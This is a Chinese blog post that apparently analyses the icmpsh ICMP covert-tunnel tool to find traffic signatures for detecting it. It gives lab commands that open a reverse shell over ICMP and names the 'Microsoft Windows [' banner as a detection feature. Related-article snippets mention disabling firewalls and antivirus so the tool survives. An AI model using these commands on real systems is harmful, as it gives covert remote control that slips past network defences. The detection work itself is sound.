ICMP隐蔽隧道工具--icmpsh流量特征检测分析

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量422 收藏 7
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36259703/article/details/135828241
版权

工具介绍

项目地址
https://github.com/bdamele/icmpsh
说明
分为客户端和服务端,其中客户端只支持在Windows中使用,服务端支持跨平台。
特点

  • C/S架构
  • 客户端使用非管理员权限

流量&逻辑分析

环境&测试准备

环境配置
控制端 Ubantu192.168.2.129
受控端 Win7 192.168.2.132
提前准备
正式使用前有一些注意事项需要提前准备一下,具体可参考链接
测试方式

  1. Windows运行命令

icmpsh.exe -t 192.168.2.129

image.png

  1. Ubantu运行命令

python2 icmpsh_m.py 192.168.2.129 192.168.2.132

image.png
成功获取shell(关于乱码问题,在windows使用chcp 65001修改一下在使用icmpsh即可)image.png

检测特征

image.png

Client逻辑分析

icmpsh的整体组成部分很简单,分为icmpsh-m.c和icmpsh-s.c
先看一下icmpsh-s.c的相关逻辑:
image.png
整体逻辑很简单,大致可以理解为调用ReadFile执行命令,结果发送给服务端,然后监听到新的命令之后,执行继续发送,没啥其他特殊的。
主要的特征是在transfer_icmp的调用过程中,无论服务端是否开启,都会发送类似

Microsoft Windows [版本 10.0.19045.3570]

的开头,中英文存在差异,但是前边的Microsoft Windows [是相同的。

Server逻辑分析

Server端逻辑也很简单,也主要是监听、发送功能,没啥特殊的。

whereGoAn
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
隐秘通信-使用PingTunnel搭建ICMP隧道实验
帮助别人等于帮助自己 ——MXi4oyu
08-09 553
Internet Control Message Protocol Internet控制报文协议,简称ICMP协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。CMP协议主要提供两种功能,一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。
浅析Icmp原理及隐蔽攻击的方式
MSB_WLAQ的博客
10-13 2482
一、ICMP隧道技术解析 1.icmp协议 Internet Control Message Protocol Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用于网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用 ICMP协议主要提供两种功能, 一种是差错报文,一种是信息类报文。信息类报文包括回显请求和回显应答,以及路由器通告和路由器请求。常见的差.
【渗透测试】ICMP隧道技术之icmpsh使用(含流量分析
SunnyCat
09-29 2808
目录一、环境二、工具三、操作1、CentOS72、Win103、反弹成功四、C2流量分析1、正常的icmp流量2、恶意的icmp流量3、C2数据总结 一、环境 Win10:10.95.16.112 CentOS7:10.95.16.103 二、工具 icmpsh python2 三、操作 win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除 centOS7安装python2对应的库文件用于支持icmpsh工具 pip2 install impacket 1、CentOS7 sysctl
ICMP隐蔽隧道实现--icmpsh
2202_75358230的博客
11-21 62
内部网络中的大多数系统位于防火墙和公司代理之后,以控制入站和出站流量。因此,可以将此协议用作隐蔽隧道,以便获得shell并在目标主机上远程执行命令。这样的话就直接pip2这个flask包 ,看准需要下载什么版本,直接install就行了。但是我们查端口的话是什么也查不到的,只能通过抓icmp包去发现数据传输。运行此工具时需要运行以下命令,禁用所有ICMP回显答复。第一个ip地址是自己的ip,第二个ip地址是目标主机。可以看出,明文传输,我们执行的命令被抓到了。之后解压缩此文件,并cd进去。
隐藏c2隧道---ICMPicmpsh的使用
qq_61142406的博客
02-12 3881
隐藏c2隧道---ICMPicmpsh的使用
ICMP隐蔽隧道攻击分析检测
2301_76725413的博客
07-28 609
进行隐蔽隧道传输的时候,被控端(防火墙内部)运行并接受外部攻击端的ICMP_ECHO数据包,攻击端把需要执行的命令隐藏在ICMP_ECHO数据包中,被控端接收到该数据包,解出其中隐藏的命令,并在防火墙内部主机上执行,再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端。样本利用ICMP协议同C2进行通信,ICMP协议中的data字段可写入任意自定义数据,样本会将上线数据填充1024个字节放在ICMP协议的data字段,并且返回的ICMP数据包的data字段也是固定的1024个字节。
【网络安全】ICMP隐蔽隧道通信与检测
Sun_study的博客
01-17 1236
在一些网络环境中,如果攻击者使用各类上层隧道(例如HTTP隧道,DNS隧道,正反向端口转发等)进行操作均失败。那么可以尝试使用ICMP建立隧道ICMP协议不需要端口的开放,因为其基于IP工作的,所以我们将其归结到网络层,ICMP消息最为常见的就是ping命令的回复,将TCP/UDP数据包封装到ICMP的ping数据包中,从而穿过防火墙**(通常防火墙是不会屏蔽ping数据包的)**
【内网流量操控技术六】icmp隧道icmpsh
redwand的博客
02-11 1587
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3022
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
Wireshark-win64-2.9.0网路抓包数据分析工具
01-07
综上所述,Wireshark-win64-2.9.0是一款强大的网络分析工具,尤其在64位Windows环境下,它能够提供详尽的网络数据包捕获和分析功能,对于网络管理和故障排查至关重要。下载并安装"Wireshark-win64-2.9.0.exe"文件,...
TCP、UDP端口及ICMP网络扫描工具-网络安全代码类资源
02-04
基于vc6.0开发网络扫描工具,利用select+connect进行TCP端口扫描,利用ICMP端口不可达报文进行UDP端口扫描,可以完成对TCP、UDP端口的探测,ICMP你懂的。利用GetBestRoute和GetIpAddrTable来判定使用本地接口IP,不...
CTF-NetA V0.3.2 流量分析工具(自动提取flag)
02-21
CTF-NetA是一款专门针对CTF比赛的网络流量分析工具,可以对常见的网络流量进行分析和提取flag,而且还有UI,不需要使用者具备任何基础能力。 CTF-NetA具有以下功能: 检测明文和常规编码的flag文本 USB流量还原...
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
10-05
天山杯第二届新疆工业互联网安全大赛初赛--Who is a traitor流量分析wp
Web安全:Web体系架构存在的安全问题和解决方室
程序员-张师傅
07-24 1477
Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。
“微软蓝屏”事件暴露了网络安全哪些问题?
Asunqingwen的博客
07-23 468
微软蓝屏事件虽然只是一次技术问题,但却暴露了当前网络安全中的诸多隐患,通过此次事件,我们应该深刻反思并采取相应措施,提升网络安全水平,保护用户和企业的信息安全。网络安全不仅仅是技术问题,更是一个系统工程,需要各方的共同努力。只有不断提升安全意识和防护能力,才能在瞬息万变的网络环境中立于不败之地。
【网络安全】构建稳固与安全的网络环境:从“微软蓝屏”事件中汲取的教训
一位前行者的博客
07-24 484
微软蓝屏”事件不仅是一次技术故障,更是一次对全球IT基础设施韧性和安全性的深刻检验。通过这次事件,我们应深刻反思并采取行动,共同构建一个更加稳固和安全的网络环境。只有这样,我们才能确保数字技术真正为世界人民带来福祉,而不是成为威胁。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
轻舟已过万重山
07-23 274
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
等级保护 总结2
最新发布
qq_25467441的博客
07-24 386
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT 的详细解释
06-13
```adb shell iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT``` 是一个修改 iptables 规则的命令,它的含义如下: - ```-A```:表示添加(append)一个新的规则到规则链的末尾。 - ```INPUT```:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值